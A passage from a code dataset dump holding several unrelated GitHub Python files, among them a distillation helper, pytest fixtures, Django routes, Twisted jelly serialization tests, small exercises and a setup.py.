abc.Mapping):\n if 'teacher' in batch and 'student' in batch:\n teacher_batch = batch['teacher']\n student_batch = batch['student']\n teacher_batch = move_to_device(teacher_batch, device)\n #teacher outputs\n if no_teacher_forward is True:\n results_T = None\n else:\n if 'teacher_cache' in batch:\n results_T = move_to_device(batch['teacher_cache'],device)\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,teacher_batch,args)\n #student outputs\n student_batch = move_to_device(student_batch, device)\n if isinstance(student_batch, abc.Mapping):\n results_S = model_S(**student_batch, **args)\n else:\n results_S = model_S(*student_batch, **args)\n else:\n batch = move_to_device(batch,device)\n if no_teacher_forward is True:\n results_T = None\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,batch,args)\n results_S = model_S(**batch, **args)\n teacher_batch = student_batch = batch\n else:\n batch = move_to_device(batch,device)\n if no_teacher_forward is True:\n results_T = None\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,batch,args)\n results_S = model_S(*batch, **args)\n teacher_batch = student_batch = batch\n \n return (teacher_batch,results_T), (student_batch,results_S)\n\ndef auto_forward(model,batch,args):\n if isinstance(batch, abc.Mapping):\n if isinstance(model,(list,tuple)):\n results = [v(**batch, **args) for v in model]\n elif isinstance(model,dict):\n results = {k:v(**batch, **args) for k,v in model.items()}\n else:\n results = model(**batch, **args)\n else:\n if isinstance(model,(list,tuple)):\n results = [v(*batch, **args) for v in model]\n elif isinstance(model,dict):\n results = {k:v(*batch, **args) for k,v in model.items()}\n else:\n results = model(*batch, **args)\n return results\n","repo_name":"airaria/TextBrewer","sub_path":"src/textbrewer/distiller_utils.py","file_name":"distiller_utils.py","file_ext":"py","file_size_in_byte":11213,"program_lang":"python","lang":"en","doc_type":"code","stars":1490,"dataset":"github-code","pt":"3"} +{"seq_id":"16233383998","text":"\"\"\"PyTest fixtures for func tests in data_io.\"\"\"\n\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\n\nimport rimseval\n\n\n@pytest.fixture\ndef mpa4a_data_ascii():\n \"\"\"Provide data for the MCS6 TDC, header states [MPA4A] format.\n\n Provide data in ASCII format, also provide the correct formatting and channel that\n contains data.\n\n :return: A tuple with channel, format, and data\n :rtype: (int, DataFormat, list)\n \"\"\"\n channel = 4\n fmt = rimseval.lst_processor.LST2CRD.ASCIIFormat.ASCII_1A\n data = [\n \"000200b95a54\",\n \"000300b95a54\",\n \"000400b95a64\",\n \"000500b95a64\",\n \"000600b95a54\",\n \"000700b95a64\",\n \"000800b95a54\",\n \"000900b95a64\",\n \"000a00b95a54\",\n ]\n return channel, fmt, data\n\n\n@pytest.fixture\ndef crdproc_int(crd_file) -> rimseval.processor.CRDFileProcessor:\n \"\"\"Provide a dummy CRDProcessor file with integrals.\n\n :param crd_file: Fixture for crd file return.\n\n :return: Dummy CRDProcessor file with integrals.\n \"\"\"\n _, _, _, fname = crd_file\n crd = rimseval.processor.CRDFileProcessor(Path(fname))\n crd.spectrum_full()\n crd.def_mcal = np.array([[1, 2], [10, 20]])\n crd.mass_calibration()\n crd.def_integrals = [\"Int1\", \"Int2\"], np.array([[1, 2], [3, 4]])\n crd.integrals = np.array([[103, 104], [203, 204]])\n\n return crd\n","repo_name":"RIMS-Code/RIMSEval","sub_path":"tests/func/data_io/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74630733200","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.HouseholdCreateView.as_view(), name=\"index\"),\n path(\"success\", views.SuccessView.as_view(), name=\"success\"),\n path(\"about\", views.AboutView.as_view(), name=\"about\"),\n path(\"contact\", views.ContactUsCreateView.as_view(), name=\"contact\"),\n path(\"contact/success\", views.ContactUsSuccessView.as_view(), name=\"contact_success\"),\n path(\"faqs\", views.FaqListView.as_view(), name=\"faqs\"),\n path(\"ajax/load-times\", views.load_times, name=\"ajax_load_times\"),\n]\n","repo_name":"curtis628/homevisit","sub_path":"homevisit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9899784304","text":"n,m,x,y=map(int,input().split())\nk=y\nwhile k>0:\n print(f\"{x} {k}\") \n k-=1\n\nflag=False\ni=x\nj=y+1\nturn=1\nwhile i<=n and i>0:\n if turn==1 or turn%2!=0:\n if turn>1:\n j=1\n while j0:\n print(f\"{i} {j}\")\n j-=1\n\n turn+=1\n if flag==False:\n i+=1\n if i==n+1:\n flag =True\n i=x-1 \n elif flag:\n i-=1\n \n \n\n\n\n \n ","repo_name":"NavalPangtey/Competitive-programming","sub_path":"python/codeforce/664B.py","file_name":"664B.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31298903933","text":"from __future__ import absolute_import, division\n\nimport datetime\nimport decimal\n\nfrom twisted.python.compat import unicode\nfrom twisted.spread import jelly, pb\nfrom twisted.trial import unittest\nfrom twisted.test.proto_helpers import StringTransport\n\n\nclass TestNode(jelly.Jellyable, object):\n \"\"\"\n An object to test jellyfying of new style class instances.\n \"\"\"\n classAttr = 4\n\n def __init__(self, parent=None):\n if parent:\n self.id = parent.id + 1\n parent.children.append(self)\n else:\n self.id = 1\n self.parent = parent\n self.children = []\n\n\n\nclass A:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def amethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\ndef afunc(self):\n \"\"\"\n A dummy function to test function serialization.\n \"\"\"\n\n\n\nclass B:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def bmethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\nclass C:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def cmethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\nclass D(object):\n \"\"\"\n Dummy new-style class.\n \"\"\"\n\n\n\nclass E(object):\n \"\"\"\n Dummy new-style class with slots.\n \"\"\"\n\n __slots__ = (\"x\", \"y\")\n\n def __init__(self, x=None, y=None):\n self.x = x\n self.y = y\n\n\n def __getstate__(self):\n return {\"x\" : self.x, \"y\" : self.y}\n\n\n def __setstate__(self, state):\n self.x = state[\"x\"]\n self.y = state[\"y\"]\n\n\n\nclass SimpleJellyTest:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def isTheSameAs(self, other):\n return self.__dict__ == other.__dict__\n\n\n\nclass JellyTests(unittest.TestCase):\n \"\"\"\n Testcases for L{jelly} module serialization.\n\n @cvar decimalData: serialized version of decimal data, to be used in tests.\n @type decimalData: L{list}\n \"\"\"\n decimalData = [b'list', [b'decimal', 995, -2], [b'decimal', 0, 0],\n [b'decimal', 123456, 0], [b'decimal', -78901, -3]]\n\n\n def _testSecurity(self, inputList, atom):\n \"\"\"\n Helper test method to test security options for a type.\n\n @param inputList: a sample input for the type.\n @type inputList: L{list}\n\n @param atom: atom identifier for the type.\n @type atom: L{str}\n \"\"\"\n c = jelly.jelly(inputList)\n taster = jelly.SecurityOptions()\n taster.allowBasicTypes()\n # By default, it should succeed\n jelly.unjelly(c, taster)\n taster.allowedTypes.pop(atom)\n # But it should raise an exception when disallowed\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, c, taster)\n\n\n def test_methodsNotSelfIdentity(self):\n \"\"\"\n If a class change after an instance has been created, L{jelly.unjelly}\n shoud raise a C{TypeError} when trying to unjelly the instance.\n \"\"\"\n a = A()\n b = B()\n c = C()\n a.bmethod = c.cmethod\n b.a = a\n savecmethod = C.cmethod\n del C.cmethod\n try:\n self.assertRaises(TypeError, jelly.unjelly, jelly.jelly(b))\n finally:\n C.cmethod = savecmethod\n\n\n def test_newStyle(self):\n \"\"\"\n Test that a new style class can be jellied and unjellied with its\n objects and attribute values preserved.\n \"\"\"\n n = D()\n n.x = 1\n n2 = D()\n n.n2 = n2\n n.n3 = n2\n c = jelly.jelly(n)\n m = jelly.unjelly(c)\n self.assertIsInstance(m, D)\n self.assertIs(m.n2, m.n3)\n self.assertEqual(m.x, 1)\n\n\n def test_newStyleWithSlots(self):\n \"\"\"\n A class defined with I{slots} can be jellied and unjellied with the\n values for its attributes preserved.\n \"\"\"\n n = E()\n n.x = 1\n c = jelly.jelly(n)\n m = jelly.unjelly(c)\n self.assertIsInstance(m, E)\n self.assertEqual(n.x, 1)\n\n\n def test_typeOldStyle(self):\n \"\"\"\n Test that an old style class type can be jellied and unjellied\n to the original type.\n \"\"\"\n t = [C]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_typeNewStyle(self):\n \"\"\"\n Test that a new style class type can be jellied and unjellied\n to the original type.\n \"\"\"\n t = [D]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_typeBuiltin(self):\n \"\"\"\n Test that a builtin type can be jellied and unjellied to the original\n type.\n \"\"\"\n t = [str]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_dateTime(self):\n \"\"\"\n Jellying L{datetime.timedelta} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n dtn = datetime.datetime.now()\n dtd = datetime.datetime.now() - dtn\n inputList = [dtn, dtd]\n c = jelly.jelly(inputList)\n output = jelly.unjelly(c)\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_decimal(self):\n \"\"\"\n Jellying L{decimal.Decimal} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [decimal.Decimal('9.95'),\n decimal.Decimal(0),\n decimal.Decimal(123456),\n decimal.Decimal('-78.901')]\n c = jelly.jelly(inputList)\n output = jelly.unjelly(c)\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_decimalUnjelly(self):\n \"\"\"\n Unjellying the s-expressions produced by jelly for L{decimal.Decimal}\n instances should result in L{decimal.Decimal} instances with the values\n represented by the s-expressions.\n\n This test also verifies that L{decimalData} contains valid jellied\n data. This is important since L{test_decimalMissing} re-uses\n L{decimalData} and is expected to be unable to produce\n L{decimal.Decimal} instances even though the s-expression correctly\n represents a list of them.\n \"\"\"\n expected = [decimal.Decimal('9.95'),\n decimal.Decimal(0),\n decimal.Decimal(123456),\n decimal.Decimal('-78.901')]\n output = jelly.unjelly(self.decimalData)\n self.assertEqual(output, expected)\n\n\n def test_decimalSecurity(self):\n \"\"\"\n By default, C{decimal} objects should be allowed by\n L{jelly.SecurityOptions}. If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [decimal.Decimal('9.95')]\n self._testSecurity(inputList, b\"decimal\")\n\n\n def test_set(self):\n \"\"\"\n Jellying C{set} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [set([1, 2, 3])]\n output = jelly.unjelly(jelly.jelly(inputList))\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_frozenset(self):\n \"\"\"\n Jellying L{frozenset} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [frozenset([1, 2, 3])]\n output = jelly.unjelly(jelly.jelly(inputList))\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_setSecurity(self):\n \"\"\"\n By default, C{set} objects should be allowed by\n L{jelly.SecurityOptions}. If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [set([1, 2, 3])]\n self._testSecurity(inputList, b\"set\")\n\n\n def test_frozensetSecurity(self):\n \"\"\"\n By default, L{frozenset} objects should be allowed by\n L{jelly.SecurityOptions}. If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [frozenset([1, 2, 3])]\n self._testSecurity(inputList, b\"frozenset\")\n\n\n def test_oldSets(self):\n \"\"\"\n Test jellying C{sets.Set}: it should serialize to the same thing as\n C{set} jelly, and be unjellied as C{set} if available.\n \"\"\"\n inputList = [jelly._sets.Set([1, 2, 3])]\n inputJelly = jelly.jelly(inputList)\n self.assertEqual(inputJelly, jelly.jelly([set([1, 2, 3])]))\n output = jelly.unjelly(inputJelly)\n # Even if the class is different, it should coerce to the same list\n self.assertEqual(list(inputList[0]), list(output[0]))\n if set is jelly._sets.Set:\n self.assertIsInstance(output[0], jelly._sets.Set)\n else:\n self.assertIsInstance(output[0], set)\n\n if not jelly._sets:\n test_oldSets.skip = \"sets.Set is gone in Python 3 and higher\"\n\n\n def test_oldImmutableSets(self):\n \"\"\"\n Test jellying C{sets.ImmutableSet}: it should serialize to the same\n thing as L{frozenset} jelly, and be unjellied as L{frozenset} if\n available.\n \"\"\"\n inputList = [jelly._sets.ImmutableSet([1, 2, 3])]\n inputJelly = jelly.jelly(inputList)\n self.assertEqual(inputJelly, jelly.jelly([frozenset([1, 2, 3])]))\n output = jelly.unjelly(inputJelly)\n # Even if the class is different, it should coerce to the same list\n self.assertEqual(list(inputList[0]), list(output[0]))\n if frozenset is jelly._sets.ImmutableSet:\n self.assertIsInstance(output[0], jelly._sets.ImmutableSet)\n else:\n self.assertIsInstance(output[0], frozenset)\n\n if not jelly._sets:\n test_oldImmutableSets.skip = (\n \"sets.ImmutableSets is gone in Python 3 and higher\")\n\n\n def test_simple(self):\n \"\"\"\n Simplest test case.\n \"\"\"\n self.assertTrue(SimpleJellyTest('a', 'b').isTheSameAs(\n SimpleJellyTest('a', 'b')))\n a = SimpleJellyTest(1, 2)\n cereal = jelly.jelly(a)\n b = jelly.unjelly(cereal)\n self.assertTrue(a.isTheSameAs(b))\n\n\n def test_identity(self):\n \"\"\"\n Test to make sure that objects retain identity properly.\n \"\"\"\n x = []\n y = (x)\n x.append(y)\n x.append(y)\n self.assertIs(x[0], x[1])\n self.assertIs(x[0][0], x)\n s = jelly.jelly(x)\n z = jelly.unjelly(s)\n self.assertIs(z[0], z[1])\n self.assertIs(z[0][0], z)\n\n\n def test_unicode(self):\n x = unicode('blah')\n y = jelly.unjelly(jelly.jelly(x))\n self.assertEqual(x, y)\n self.assertEqual(type(x), type(y))\n\n\n def test_stressReferences(self):\n reref = []\n toplevelTuple = ({'list': reref}, reref)\n reref.append(toplevelTuple)\n s = jelly.jelly(toplevelTuple)\n z = jelly.unjelly(s)\n self.assertIs(z[0]['list'], z[1])\n self.assertIs(z[0]['list'][0], z)\n\n\n def test_moreReferences(self):\n a = []\n t = (a,)\n a.append((t,))\n s = jelly.jelly(t)\n z = jelly.unjelly(s)\n self.assertIs(z[0][0][0], z)\n\n\n def test_typeSecurity(self):\n \"\"\"\n Test for type-level security of serialization.\n \"\"\"\n taster = jelly.SecurityOptions()\n dct = jelly.jelly({})\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, dct, taster)\n\n\n def test_newStyleClasses(self):\n uj = jelly.unjelly(D)\n self.assertIs(D, uj)\n\n\n def test_lotsaTypes(self):\n \"\"\"\n Test for all types currently supported in jelly\n \"\"\"\n a = A()\n jelly.unjelly(jelly.jelly(a))\n jelly.unjelly(jelly.jelly(a.amethod))\n items = [afunc, [1, 2, 3], not bool(1), bool(1), 'test', 20.3,\n (1, 2, 3), None, A, unittest, {'a': 1}, A.amethod]\n for i in items:\n self.assertEqual(i, jelly.unjelly(jelly.jelly(i)))\n\n\n def test_setState(self):\n global TupleState\n class TupleState:\n def __init__(self, other):\n self.other = other\n def __getstate__(self):\n return (self.other,)\n def __setstate__(self, state):\n self.other = state[0]\n def __hash__(self):\n return hash(self.other)\n a = A()\n t1 = TupleState(a)\n t2 = TupleState(a)\n t3 = TupleState((t1, t2))\n d = {t1: t1, t2: t2, t3: t3, \"t3\": t3}\n t3prime = jelly.unjelly(jelly.jelly(d))[\"t3\"]\n self.assertIs(t3prime.other[0].other, t3prime.other[1].other)\n\n\n def test_classSecurity(self):\n \"\"\"\n Test for class-level security of serialization.\n \"\"\"\n taster = jelly.SecurityOptions()\n taster.allowInstancesOf(A, B)\n a = A()\n b = B()\n c = C()\n # add a little complexity to the data\n a.b = b\n a.c = c\n # and a backreference\n a.x = b\n b.c = c\n # first, a friendly insecure serialization\n friendly = jelly.jelly(a, taster)\n x = jelly.unjelly(friendly, taster)\n self.assertIsInstance(x.c, jelly.Unpersistable)\n # now, a malicious one\n mean = jelly.jelly(a)\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, mean, taster)\n self.assertIs(x.x, x.b, \"Identity mismatch\")\n # test class serialization\n friendly = jelly.jelly(A, taster)\n x = jelly.unjelly(friendly, taster)\n self.assertIs(x, A, \"A came back: %s\" % x)\n\n\n def test_unjellyable(self):\n \"\"\"\n Test that if Unjellyable is used to deserialize a jellied object,\n state comes out right.\n \"\"\"\n class JellyableTestClass(jelly.Jellyable):\n pass\n jelly.setUnjellyableForClass(JellyableTestClass, jelly.Unjellyable)\n input = JellyableTestClass()\n input.attribute = 'value'\n output = jelly.unjelly(jelly.jelly(input))\n self.assertEqual(output.attribute, 'value')\n self.assertIsInstance(output, jelly.Unjellyable)\n\n\n def test_persistentStorage(self):\n perst = [{}, 1]\n def persistentStore(obj, jel, perst = perst):\n perst[1] = perst[1] + 1\n perst[0][perst[1]] = obj\n return str(perst[1])\n\n def persistentLoad(pidstr, unj, perst = perst):\n pid = int(pidstr)\n return perst[0][pid]\n\n a = SimpleJellyTest(1, 2)\n b = SimpleJellyTest(3, 4)\n c = SimpleJellyTest(5, 6)\n\n a.b = b\n a.c = c\n c.b = b\n\n jel = jelly.jelly(a, persistentStore = persistentStore)\n x = jelly.unjelly(jel, persistentLoad = persistentLoad)\n\n self.assertIs(x.b, x.c.b)\n self.assertTrue(perst[0], \"persistentStore was not called.\")\n self.assertIs(x.b, a.b, \"Persistent storage identity failure.\")\n\n\n def test_newStyleClassesAttributes(self):\n n = TestNode()\n n1 = TestNode(n)\n TestNode(n1)\n TestNode(n)\n # Jelly it\n jel = jelly.jelly(n)\n m = jelly.unjelly(jel)\n # Check that it has been restored ok\n self._check_newstyle(n, m)\n\n\n def _check_newstyle(self, a, b):\n self.assertEqual(a.id, b.id)\n self.assertEqual(a.classAttr, 4)\n self.assertEqual(b.classAttr, 4)\n self.assertEqual(len(a.children), len(b.children))\n for x, y in zip(a.children, b.children):\n self._check_newstyle(x, y)\n\n\n def test_referenceable(self):\n \"\"\"\n A L{pb.Referenceable} instance jellies to a structure which unjellies to\n a L{pb.RemoteReference}. The C{RemoteReference} has a I{luid} that\n matches up with the local object key in the L{pb.Broker} which sent the\n L{Referenceable}.\n \"\"\"\n ref = pb.Referenceable()\n jellyBroker = pb.Broker()\n jellyBroker.makeConnection(StringTransport())\n j = jelly.jelly(ref, invoker=jellyBroker)\n\n unjellyBroker = pb.Broker()\n unjellyBroker.makeConnection(StringTransport())\n\n uj = jelly.unjelly(j, invoker=unjellyBroker)\n self.assertIn(uj.luid, jellyBroker.localObjects)\n\n\n\nclass JellyDeprecationTests(unittest.TestCase):\n \"\"\"\n Tests for deprecated Jelly things\n \"\"\"\n\n def test_deprecatedInstanceAtom(self):\n \"\"\"\n L{jelly.instance_atom} is deprecated since 15.0.0.\n \"\"\"\n jelly.instance_atom\n warnings = self.flushWarnings([self.test_deprecatedInstanceAtom])\n self.assertEqual(len(warnings), 1)\n self.assertEqual(\n warnings[0]['message'],\n 'twisted.spread.jelly.instance_atom was deprecated in Twisted '\n '15.0.0: instance_atom is unused within Twisted.')\n self.assertEqual(\n warnings[0]['category'],\n DeprecationWarning)\n\n\n def test_deprecatedUnjellyingInstanceAtom(self):\n \"\"\"\n Unjellying the instance atom is deprecated with 15.0.0.\n \"\"\"\n jelly.unjelly(\n [\"instance\",\n [\"class\", \"twisted.spread.test.test_jelly.A\"],\n [\"dictionary\"]])\n warnings = self.flushWarnings()\n self.assertEqual(len(warnings), 1)\n self.assertEqual(\n warnings[0]['message'],\n \"Unjelly support for the instance atom is deprecated since \"\n \"Twisted 15.0.0. Upgrade peer for modern instance support.\")\n self.assertEqual(\n warnings[0]['category'],\n DeprecationWarning)\n\n\n\nclass ClassA(pb.Copyable, pb.RemoteCopy):\n def __init__(self):\n self.ref = ClassB(self)\n\n\n\nclass ClassB(pb.Copyable, pb.RemoteCopy):\n def __init__(self, ref):\n self.ref = ref\n\n\n\nclass CircularReferenceTests(unittest.TestCase):\n \"\"\"\n Tests for circular references handling in the jelly/unjelly process.\n \"\"\"\n\n def test_simpleCircle(self):\n jelly.setUnjellyableForClass(ClassA, ClassA)\n jelly.setUnjellyableForClass(ClassB, ClassB)\n a = jelly.unjelly(jelly.jelly(ClassA()))\n self.assertIs(a.ref.ref, a,\n \"Identity not preserved in circular reference\")\n\n\n def test_circleWithInvoker(self):\n class DummyInvokerClass:\n pass\n dummyInvoker = DummyInvokerClass()\n dummyInvoker.serializingPerspective = None\n a0 = ClassA()\n jelly.setUnjellyableForClass(ClassA, ClassA)\n jelly.setUnjellyableForClass(ClassB, ClassB)\n j = jelly.jelly(a0, invoker=dummyInvoker)\n a1 = jelly.unjelly(j)\n self.failUnlessIdentical(a1.ref.ref, a1,\n \"Identity not preserved in circular reference\")\n\n\n def test_set(self):\n \"\"\"\n Check that a C{set} can contain a circular reference and be serialized\n and unserialized without losing the reference.\n \"\"\"\n s = set()\n a = SimpleJellyTest(s, None)\n s.add(a)\n res = jelly.unjelly(jelly.jelly(a))\n self.assertIsInstance(res.x, set)\n self.assertEqual(list(res.x), [res])\n\n\n def test_frozenset(self):\n \"\"\"\n Check that a L{frozenset} can contain a circular reference and be\n serialized and unserialized without losing the reference.\n \"\"\"\n a = SimpleJellyTest(None, None)\n s = frozenset([a])\n a.x = s\n res = jelly.unjelly(jelly.jelly(a))\n self.assertIsInstance(res.x, frozenset)\n self.assertEqual(list(res.x), [res])\n","repo_name":"wistbean/learn_python3_spider","sub_path":"stackoverflow/venv/lib/python3.6/site-packages/twisted/spread/test/test_jelly.py","file_name":"test_jelly.py","file_ext":"py","file_size_in_byte":19862,"program_lang":"python","lang":"en","doc_type":"code","stars":14022,"dataset":"github-code","pt":"3"} +{"seq_id":"71339530643","text":"# Exercício 8.16 - Livro\n\ndef isPrimo(valor=0):\n if valor < 2:\n return False\n else:\n divisor = 1\n cont_divisor = 0\n while divisor <= valor:\n if valor % divisor == 0:\n cont_divisor += 1\n divisor += 1\n if cont_divisor > 2:\n return False\n else:\n return True\n\ndef numeroPrimo(total=0):\n valor = 1\n while True:\n if total < 1:\n break\n if isPrimo(valor):\n yield valor\n total -= 1\n valor += 1\nnumP = numeroPrimo(20)\nprint([num for num in numP])\n","repo_name":"josevini/python","sub_path":"Introdução à Programação/capitulo8/ex_8-16.py","file_name":"ex_8-16.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29255932237","text":"from maps.doc.proto.testhelper.validator import Validator\nfrom yandex.maps.proto.search.business_pb2 import ResponseMetadata\nimport math\n\nvalidator = Validator('search')\n\n\ndef test_range_filters():\n message = ResponseMetadata()\n\n f = message.filter.add()\n f.id = 'hotel_reservation'\n f.name = 'Hotel reservation dates'\n f.date_filter.SetInParent()\n\n f = message.filter.add()\n f.id = 'price_room_range'\n f.name = 'Цена проживания за ночь'\n setattr(f.range_filter, 'from', 4000)\n f.range_filter.to = 20000\n\n f = message.filter.add()\n f.id = 'rating_range'\n f.name = 'Рейтинг организации'\n setattr(f.range_filter, 'from', 0)\n f.range_filter.to = 5\n\n f = message.filter.add()\n f.id = 'number_of_lanes'\n f.name = 'Количество дорожек (недоступный признак)'\n f.disabled = True\n setattr(f.range_filter, 'from', math.nan)\n f.range_filter.to = math.nan\n\n validator.validate_example(message, 'range_filters')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_range_filters.py","file_name":"test_range_filters.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3863440600","text":"def joint():\r\n a = \"Hello\"\r\n b = \"World\"\r\n c = \"I am\"\r\n d = \"Tanishka\"\r\n e = \"I am at\"\r\n f = \"Bangalore\"\r\n #g = (a +\" \"+ b)\r\n #print(g)\r\n # h = \"%s %s\"%(c,d)\r\n # print(h)\r\n i=\" \".join([e,f])\r\n print(i)\r\njoint()","repo_name":"Tanish456/Python","sub_path":"practicejjointstring.py","file_name":"practicejjointstring.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17854937604","text":"def get_badElectrodes(path=\"C:/Users/sound/Downloads/m24_load_javier/\"):\n fname = \"bad_electrodes.csv\"\n with open(path+fname,\"r\") as f:\n lines = f.readlines()\n bad = []\n for l in lines[1:]:\n x = l.strip()\n if x[0] == \"#\":\n continue\n bad.append(x)\n return bad\n","repo_name":"soundingreen/professional-internship-historical","sub_path":"m24_load_javier_vFINAL/m24_aux.py","file_name":"m24_aux.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078579727","text":"import os, sys\n\nfrom setuptools import setup, find_packages\n\nbase_dir = os.path.dirname(__file__)\n\nsetup(\n name='picky',\n version='0.9.2',\n author='Chris Withers',\n author_email='chris@simplistix.co.uk',\n license='MIT',\n description=(\n \"A tool for checking versions of packages used by conda or pip \"\n \"are as specified in their requirements files.\"\n ),\n long_description=open(os.path.join(base_dir,'docs','description.rst')).read(),\n url='https://github.com/Simplistix/picky',\n classifiers=[],\n zip_safe=False,\n include_package_data=True,\n extras_require={\n 'build': ['sphinx', 'pkginfo', 'setuptools-git', 'twine', 'wheel']\n},\n)\n","repo_name":"simplistix/picky","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"12598688203","text":"\"\"\"\nTests for util.date_utils\n\"\"\"\n\nimport unittest\nfrom datetime import datetime, timedelta, tzinfo\nfrom unittest.mock import patch\n\nimport crum\nimport ddt\nimport pytest\nfrom markupsafe import Markup\nfrom pytz import utc\n\nfrom django.test.client import RequestFactory\n\nfrom common.djangoapps.util.date_utils import (\n almost_same_datetime, get_default_time_display, get_time_display, strftime_localized, strftime_localized_html\n)\n\n\ndef test_get_default_time_display():\n assert get_default_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_dflt_time_disp_notz():\n test_time = datetime(1992, 3, 12, 15, 3, 30)\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_time_disp_ret_empty():\n assert get_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time, \"\") == \"\"\n\n\ndef test_get_time_display():\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time, 'dummy text') == \"dummy text\"\n assert get_time_display(test_time, '%b %d %Y') == \"Mar 12 1992\"\n assert get_time_display(test_time, '%b %d %Y %Z') == \"Mar 12 1992 UTC\"\n assert get_time_display(test_time, '%b %d %H:%M') == \"Mar 12 15:03\"\n\n\ndef test_get_time_pass_through():\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time, None) == \"Mar 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time, \"%\") == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_time_display_coerce():\n test_time_standard = datetime(1992, 1, 12, 15, 3, 30, tzinfo=utc)\n test_time_daylight = datetime(1992, 7, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time_standard, None, coerce_tz=\"US/Pacific\") == \"Jan 12, 1992 at 07:03 PST\"\n assert get_time_display(test_time_standard, None, coerce_tz=\"NONEXISTENTTZ\") == \"Jan 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time_standard, '%b %d %H:%M', coerce_tz=\"US/Pacific\") == \"Jan 12 07:03\"\n assert get_time_display(test_time_daylight, None, coerce_tz=\"US/Pacific\") == \"Jul 12, 1992 at 08:03 PDT\"\n assert get_time_display(test_time_daylight, None, coerce_tz=\"NONEXISTENTTZ\") == \"Jul 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time_daylight, '%b %d %H:%M', coerce_tz=\"US/Pacific\") == \"Jul 12 08:03\"\n\n\nclass NamelessTZ(tzinfo): # lint-amnesty, pylint: disable=abstract-method\n \"\"\"Static timezone for testing\"\"\"\n\n def utcoffset(self, _dt):\n return timedelta(hours=-3)\n\n def dst(self, _dt):\n return timedelta(0)\n\n\ndef test_get_default_time_display_no_tzname():\n assert get_default_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=NamelessTZ())\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03-0300\"\n\n\ndef test_almost_same_datetime():\n assert almost_same_datetime(\n datetime(2013, 5, 3, 10, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29)\n )\n\n assert almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29),\n timedelta(hours=1)\n )\n\n assert not 